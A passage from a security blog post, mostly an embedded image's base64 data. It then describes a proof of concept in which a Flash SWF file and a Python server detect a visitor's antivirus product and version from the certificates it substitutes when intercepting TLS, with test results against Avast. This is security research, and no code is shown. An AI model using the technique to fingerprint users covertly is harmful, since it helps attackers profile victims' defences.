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" width="400" /></a></div>
<br />
<br />
<br />
Actually, the idea of method is based on the research of Facebook - <a href="https://www.linshunghuang.com/papers/mitm.pdf">https://www.linshunghuang.com/papers/mitm.pdf</a>. They used a special swf for a "real" MitM detection. But they didn't share the sources of the project.<br />
<br />
I've created a PoC to test this method (it's far from real implementation) - <a href="https://github.com/GrrrDog/FlashAV">https://github.com/GrrrDog/FlashAV</a>. It consists of a special swf file and a python server. The swf sends a raw SSLv3 request and resends a response to the python server. The python server is used for certificate "parsing" and for crossdomain socket policy distribution.<br />
<br />
<b>Results:</b><br />
My initial tests have been made on Avast AV. And it works great. I've got AV's certificates for IE and Chrome when Swf connects to 443 port. Avast has not intercepted connections from Firefox to 443 port of a server. However, in case of Firefox if swf connects to 465(587/995/etc) port (SMTPs), AV intercepts it and we can get a version of AV again.<br />
<br />
Here is an example<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh0WuvoBPaQSqcDswY4gXCEq5gJM0_rO8jMTLYqVNk4MNMEQ3gaE6auxt7cP6aCVuO34QwSNbuQbNWy_bZm2If6KC2sPrECOEkIR6tVgItlPfIuvm4mz69GPe8DrScVwqSHNoXuX5M6Tmy/s1600/rootCA.png" imageanchor="1"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh0WuvoBPaQSqcDswY4gXCEq5gJM0_rO8jMTLYqVNk4MNMEQ3gaE6auxt7cP6aCVuO34QwSNbuQbNWy_bZm2If6KC2sPrECOEkIR6tVgItlPfIuvm4mz69GPe8DrScVwqSHNoXuX5M6Tmy/s320/rootCA.png" width="233" /></a><br />
<br />
